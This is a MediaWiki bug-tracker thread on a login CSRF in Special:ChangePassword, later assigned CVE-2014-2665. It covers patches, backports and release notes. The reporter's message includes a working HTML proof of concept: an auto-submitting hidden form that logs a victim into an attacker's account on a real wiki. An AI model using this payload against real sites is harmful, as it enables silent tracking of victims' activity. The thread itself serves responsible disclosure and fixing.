Last modified: 2014-04-01 20:59:13 UTC
Gopinath (via codex.galleryproject.org) reported a login csrf on Special:ChangePassword. Confirmed this in master. Note with the PoC, the victim must have an existing _session cookie on the target wiki, otherwise the login fails. Special:ChangePassword should use a login token. >>>> On Sun, Mar 9, 2014 at 12:16 PM, Bharat Mediratta <bharat@menalto.com> wrote: Hi, Wikimedia folks - Gopinath is reporting a vulnerability in Mediawiki 1.22.3 which is running on codex.galleryproject.org - can you take a look at this and decide whether it's something you want to resolve in the Mediawiki codebase? -Bharat On Fri, Mar 7, 2014 at 10:14 PM, Gopinath <gopiengg@gmail.com> wrote: Hi, Through below CSRF Code user can be logged into the attackers account, without knowledge of user.So attacker can track the user activity. User also wont know the attacker account password .Attacker can request password reset for his account and can get the value of wpPassword parameter. POC Code <html> <head> </head> <body onload=document.forms[0].submit();> <form action="http://codex.galleryproject.org/Special:ChangePassword" method="POST"> <input type="hidden" name="returnto" value="Main Page" /> <input type="hidden" name="token" value="+\" /> <input type="hidden" name="wpDomain" value="" /> <input type="hidden" name="wpName" value="Gopinath6" /> <input type="hidden" name="wpNewPassword" value=password1234 /> <input type="hidden" name="wpPassword" value=7qbuqjjsme /> <input type="hidden" name="wpRetype" value=password1234 /> </form> </body> </html> Regards Gopinath
Created attachment 14787 [details] Add CSRF token on Special:ChangePassword
The patch looks good to me.
Early access for Wikia.
Do we already have a CVE for this bug?
Not yet. I'll request one as soon as we make it public.
Created attachment 14927 [details] Backport to REL1_22 Backported to the best of my knowledge. Special:ChangePassword tested. Can't reproduce the attack, so someone with a deeper understanding of this vulnerability should look at it and confirm it fixes the security issue.
Created attachment 14933 [details] Backport to REL1_22 I hit a couple issues when testing your patch. I think this is a slightly better way to do it.
Created attachment 14938 [details] Backport to REL1_21 Backport similar to 14933, so Chris' changes are already considered. Changing passwords was tested. Please look for potentail security implications.
Created attachment 14939 [details] Backport to REL1_19 Considering Chris' new version of the backport for REL1_22. Tested password change. Still works.
Tested the 1.19 backport patch, and confirmed it fixes the vulnerability.
Fix is released in MW 1.19.14, 1.21.8 and 1.22.5. WMF sites are patched.
Comment on attachment 14787 [details] Add CSRF token on Special:ChangePassword The token compare function is _not_ running in constant time. As we have a function for token comparison, we should use it here.
see http://www.gossamer-threads.com/lists/wiki/mediawiki-cvs/436923 (well, this is essential for _password_ comparison, perhaps not necessarily needed for token comparison, as already discussed elsewhere)
For the records, https://www.mediawiki.org/w/index.php?title=Project:Support_desk#Session_Hijacking_error_after_Update_1.19.14_41441 lists an issue with the 1.19.14 tarball including the backport for this.
Markus just released 1.19.15 to fix the password reset issue.
Correction, Markus will release 1.19.15 tomorrow to fix the issue. Sorry about that.
This was assigned CVE-2014-2665. http://openwall.com/lists/oss-security/2014/04/01/7 The MITRE email also documents their understanding of "Login CSRF", which is good background if this issue pops up again.
